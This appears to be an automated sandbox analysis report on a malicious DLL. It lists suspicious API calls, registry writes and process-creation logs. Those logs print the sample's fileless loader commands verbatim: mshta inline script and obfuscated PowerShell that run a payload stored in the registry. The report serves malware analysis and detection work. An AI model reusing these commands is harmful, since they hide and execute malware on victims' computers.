Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Uses 32bit PE files

Source: 61f113091fd0c.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Yara signature match

Source: 00000001.00000002.511490355.000000000134C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Matched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =

Detected potential crypto function

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_01C14BB3	1_2_01C14BB3
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_01C1436E	1_2_01C1436E
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_01C180D0	1_2_01C180D0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00DC0DF9	1_2_00DC0DF9
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00DC0DF7	1_2_00DC0DF7
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046DF4D0	1_2_046DF4D0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046D2CB8	1_2_046D2CB8
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046E0CB2	1_2_046E0CB2
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046C68B2	1_2_046C68B2
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046C2D25	1_2_046C2D25
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046E1DEA	1_2_046E1DEA
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046E01A5	1_2_046E01A5
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046CF641	1_2_046CF641
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_031F436E	3_2_031F436E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_031F4BB3	3_2_031F4BB3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_031F80D0	3_2_031F80D0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BD2CB8	3_2_04BD2CB8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BE0CB2	3_2_04BE0CB2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BDF4D0	3_2_04BDF4D0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BE1418	3_2_04BE1418
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BE1D92	3_2_04BE1D92
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BE1DEA	3_2_04BE1DEA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BC2D25	3_2_04BC2D25
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BCF641	3_2_04BCF641
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BC68B2	3_2_04BC68B2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BE01A5	3_2_04BE01A5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BD3924	3_2_04BD3924
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BE7358	3_2_04BE7358
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_01120DF7	4_2_01120DF7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_01120DF9	4_2_01120DF9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EC1DEA	4_2_05EC1DEA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EA2D25	4_2_05EA2D25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EBF4D0	4_2_05EBF4D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EB2CB8	4_2_05EB2CB8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EC0CB2	4_2_05EC0CB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EAF641	4_2_05EAF641
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EC01A5	4_2_05EC01A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EB3924	4_2_05EB3924
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EA68B2	4_2_05EA68B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0105436E	5_2_0105436E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_01054BB3	5_2_01054BB3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010580D0	5_2_010580D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00EB0DF9	5_2_00EB0DF9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00EB0DF7	5_2_00EB0DF7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05112D25	5_2_05112D25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05131D92	5_2_05131D92
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05131DEA	5_2_05131DEA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05131418	5_2_05131418
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05130CB2	5_2_05130CB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05122CB8	5_2_05122CB8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0512F4D0	5_2_0512F4D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0511F641	5_2_0511F641
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05123924	5_2_05123924
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_051301A5	5_2_051301A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_051168B2	5_2_051168B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05137358	5_2_05137358

Contains functionality to launch a process as a different user

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_046D9499 CreateProcessAsUserW,

1_2_046D9499

Contains functionality to call native functions

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_01C12F8D GetProcAddress,NtCreateSection,memset,	1_2_01C12F8D
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_01C1373D NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	1_2_01C1373D
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_01C14AAF NtMapViewOfSection,	1_2_01C14AAF
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_01C182F5 NtQueryVirtualMemory,	1_2_01C182F5
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00DC0880 NtAllocateVirtualMemory,	1_2_00DC0880
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00DC0AB8 NtProtectVirtualMemory,	1_2_00DC0AB8
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046CB45A NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,	1_2_046CB45A
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046CD4F4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	1_2_046CD4F4
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046CE4DC GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,	1_2_046CE4DC
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046D70AC NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,	1_2_046D70AC
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046D4560 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,	1_2_046D4560
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046E3E7D NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,	1_2_046E3E7D
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046DD6E3 NtQueryInformationProcess,	1_2_046DD6E3
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046DBEBC GetProcAddress,NtCreateSection,memset,	1_2_046DBEBC
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046C6F70 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,	1_2_046C6F70
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046D0FE0 NtMapViewOfSection,	1_2_046D0FE0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046CA7FE memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset,	1_2_046CA7FE
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046CAFD1 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,	1_2_046CAFD1
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046CECE9 NtGetContextThread,RtlNtStatusToDosError,	1_2_046CECE9
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046DF0CC memset,NtQueryInformationProcess,	1_2_046DF0CC
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046C1D70 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,	1_2_046C1D70
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046D595B NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,	1_2_046D595B
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046DA1FC NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,	1_2_046DA1FC
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046E2588 NtQuerySystemInformation,RtlNtStatusToDosError,	1_2_046E2588
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046C3EBE NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,	1_2_046C3EBE
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046D630F memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,	1_2_046D630F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_031F373D NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	3_2_031F373D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_031F2F8D GetProcAddress,NtCreateSection,memset,	3_2_031F2F8D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_031F4AAF NtMapViewOfSection,	3_2_031F4AAF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_031F82F5 NtQueryVirtualMemory,	3_2_031F82F5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BCD4F4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	3_2_04BCD4F4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BCE4DC GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,	3_2_04BCE4DC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BCB45A NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,	3_2_04BCB45A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BD4560 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,	3_2_04BD4560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BDBEBC GetProcAddress,NtCreateSection,memset,	3_2_04BDBEBC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BDD6E3 NtQueryInformationProcess,	3_2_04BDD6E3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BE3E7D NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,	3_2_04BE3E7D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BCA7FE memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset,	3_2_04BCA7FE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BD0FE0 NtMapViewOfSection,	3_2_04BD0FE0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BCAFD1 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,	3_2_04BCAFD1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BC6F70 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,	3_2_04BC6F70
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BD70AC NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,	3_2_04BD70AC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BCECE9 NtGetContextThread,RtlNtStatusToDosError,	3_2_04BCECE9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BE2588 NtQuerySystemInformation,RtlNtStatusToDosError,	3_2_04BE2588
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BC1D70 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,	3_2_04BC1D70
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BC3EBE NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,	3_2_04BC3EBE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BDF0CC memset,NtQueryInformationProcess,	3_2_04BDF0CC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BDA1FC NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,	3_2_04BDA1FC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BD595B NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,	3_2_04BD595B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BD630F memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,	3_2_04BD630F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_01120880 NtAllocateVirtualMemory,	4_2_01120880
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_01120AB8 NtProtectVirtualMemory,	4_2_01120AB8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EB4560 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,	4_2_05EB4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EAD4F4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	4_2_05EAD4F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EAE4DC GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,	4_2_05EAE4DC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EAB45A NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,	4_2_05EAB45A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EAAFD1 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,	4_2_05EAAFD1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EA6F70 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,	4_2_05EA6F70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EBD6E3 NtQueryInformationProcess,	4_2_05EBD6E3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EC2588 NtQuerySystemInformation,RtlNtStatusToDosError,	4_2_05EC2588
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EA1D70 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,	4_2_05EA1D70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EAECE9 NtGetContextThread,RtlNtStatusToDosError,	4_2_05EAECE9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EA3EBE NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,	4_2_05EA3EBE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EC3E7D NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,	4_2_05EC3E7D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EBA1FC NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,	4_2_05EBA1FC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EB595B NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,	4_2_05EB595B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EBF0CC memset,NtQueryInformationProcess,	4_2_05EBF0CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EB70AC NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,	4_2_05EB70AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EB630F memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,	4_2_05EB630F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0105373D NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	5_2_0105373D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_01052F8D GetProcAddress,NtCreateSection,memset,	5_2_01052F8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_01054AAF NtMapViewOfSection,	5_2_01054AAF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010582F5 NtQueryVirtualMemory,	5_2_010582F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00EB0AB8 NtProtectVirtualMemory,	5_2_00EB0AB8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00EB0880 NtAllocateVirtualMemory,	5_2_00EB0880
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05124560 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,	5_2_05124560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0511B45A NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,	5_2_0511B45A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0511E4DC GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,	5_2_0511E4DC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0511D4F4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	5_2_0511D4F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05116F70 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,	5_2_05116F70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0511AFD1 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,	5_2_0511AFD1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0512D6E3 NtQueryInformationProcess,	5_2_0512D6E3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05111D70 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,	5_2_05111D70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05132588 NtQuerySystemInformation,RtlNtStatusToDosError,	5_2_05132588
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0511ECE9 NtGetContextThread,RtlNtStatusToDosError,	5_2_0511ECE9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05133E7D NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,	5_2_05133E7D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05113EBE NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,	5_2_05113EBE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0512595B NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,	5_2_0512595B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0512A1FC NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,	5_2_0512A1FC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_051270AC NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,	5_2_051270AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0512F0CC memset,NtQueryInformationProcess,	5_2_0512F0CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0512630F memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,	5_2_0512630F

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Tries to load missing DLLs

Source: C:\Windows\SysWOW64\regsvr32.exe

Section loaded: sfc.dll

Jump to behavior

PE / OLE file has an invalid certificate

Source: 61f113091fd0c.dll

Static PE information: invalid certificate

Source: 61f113091fd0c.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\61f113091fd0c.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\61f113091fd0c.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\61f113091fd0c.dll
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\61f113091fd0c.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\61f113091fd0c.dll,DllRegisterServer
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Tm45='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Tm45).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Sr9b='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Sr9b).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Agjk='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Agjk).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Eote='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Eote).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name gpcceqbj -value gp; new-alias -name qlrwbeixf -value iex; qlrwbeixf ([System.Text.Encoding]::ASCII.GetString((gpcceqbj "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
